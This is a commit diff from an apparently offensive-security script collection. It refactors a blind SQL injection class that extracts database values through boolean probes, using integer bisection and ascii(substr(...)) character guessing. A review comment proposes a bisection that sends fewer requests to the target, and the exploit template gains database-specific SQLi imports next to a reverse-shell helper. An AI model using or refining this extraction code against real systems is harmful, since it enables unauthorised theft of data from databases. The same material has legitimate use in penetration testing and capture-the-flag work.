
sqli template

Roman Hergenreder 2 months ago
parent
commit
4b02f0bf25
2 changed files with 12 additions and 10 deletions
  1. 11 10
      sqli.py
  2. 1 0
      template.py

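--- a/sqli.py
+++ b/sqli.py
@@ -22,7 +22,7 @@ class SQLi(ABC):
 
         if not binary_search:
             cur_int = 1
-            while self.blind_sqli(f"({query})>{cur_int}"):
+            while self.blind_sqli(f"({query})>{cur_int}", verbose):
                 cur_int += 1
 
             return cur_int
@@ -30,16 +30,15 @@ class SQLi(ABC):
             min_value = 1
             max_value = 1
 
-            while self.blind_sqli(f"({query})>{max_value}"):
+            while self.blind_sqli(f"({query})>{max_value}", verbose):
                 min_value = max_value + 1
                 max_value = max_value * 2
 
-            max_value = max_value - 1
             while True:
                 cur_int = (min_value + max_value) // 2
-                if self.blind_sqli(f"({query})>{cur_int}"):
+                if self.blind_sqli(f"({query})>{cur_int}", verbose):
                     min_value = cur_int + 1
-                elif self.blind_sqli(f"({query})<{cur_int}"):
+                elif self.blind_sqli(f"({query})<{cur_int}", verbose):
                     max_value = cur_int - 1
                 else:
                     return cur_int
@@ -67,7 +66,7 @@ class SQLi(ABC):
             found = False
             query = self.build_query(f"ascii(substr({column},{len(cur_str) + 1},1))", table, condition, offset)
             for c in charset:
-                if self.blind_sqli(f"({query})={ord(c)}"):
+                if self.blind_sqli(f"({query})={ord(c)}", verbose):
                     found = True
                     cur_str += c
                     if verbose:
@@ -93,20 +92,22 @@ class SQLi(ABC):
 
         return rows
 
+    # Following methods need to be implemented in the exploit
     @abstractmethod
-    def get_database_version(self, verbose=False):
+    def blind_sqli(self, condition: str, verbose=False) -> bool:
         pass
 
+    # Following methods will be implemented by MySQLi, PostgreSQLi, ...
     @abstractmethod
-    def get_current_user(self, verbose=False):
+    def get_database_version(self, verbose=False):
         pass
 
     @abstractmethod
-    def get_current_database(self, verbose=False):
+    def get_current_user(self, verbose=False):
         pass
 
     @abstractmethod
-    def blind_sqli(self, condition: str, verbose=False) -> bool:
+    def get_current_database(self, verbose=False):
         pass
 
     @abstractmethod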
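Review bot: In the `@@ -30,16 +30,15 @@` hunk the bisection step still spends up to two blind requests per halving (`>{cur_int}` and then `<{cur_int}`) even though, once the doubling loop has bracketed the value inside `[min_value, max_value]`, the second probe is redundant and roughly doubles the number of requests sent to the target. Keeping a single `>` probe per step and narrowing with `max_value = cur_int` until `min_value == max_value` halves the request count without changing the result for non-negative values, and starting `min_value` at 0 keeps the current correct answer for a value of 0. As written, the `>`/`<` pair also never converges if the expression is ever below 0 (`cur_int` stays at 0 once `max_value` goes negative), although the `count`/`ascii(...)` expressions this appears to be used with should not produce that. Since every `False` from `blind_sqli` steers the search, the new abstract `blind_sqli` contract is worth documenting as "return True only when the injected condition definitely evaluated true; raise on transport errors, timeouts or blocking rather than returning False", otherwise a rate limit silently yields a wrong but plausible value. The enclosing method's `def` line and its `binary_search` parameter sit above the first hunk, outside the diff.
```python
            min_value = 0
            max_value = 1

            while self.blind_sqli(f"({query})>{max_value}", verbose):
                min_value = max_value + 1
                max_value = max_value * 2

            # invariant: min_value <= value <= max_value; one request per halving
            while min_value < max_value:
                cur_int = (min_value + max_value) // 2
                if self.blind_sqli(f"({query})>{cur_int}", verbose):
                    min_value = cur_int + 1
                else:
                    max_value = cur_int

            return min_value
```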

+ 1 - 0
template.py

@@ -102,6 +102,7 @@ import urllib.parse
 from bs4 import BeautifulSoup
 from hackingscripts import util, rev_shell
 from hackingscripts.fileserver import HttpFileServer
+from hackingscripts.sqli import MySQLi, PostgreSQLi
 from urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)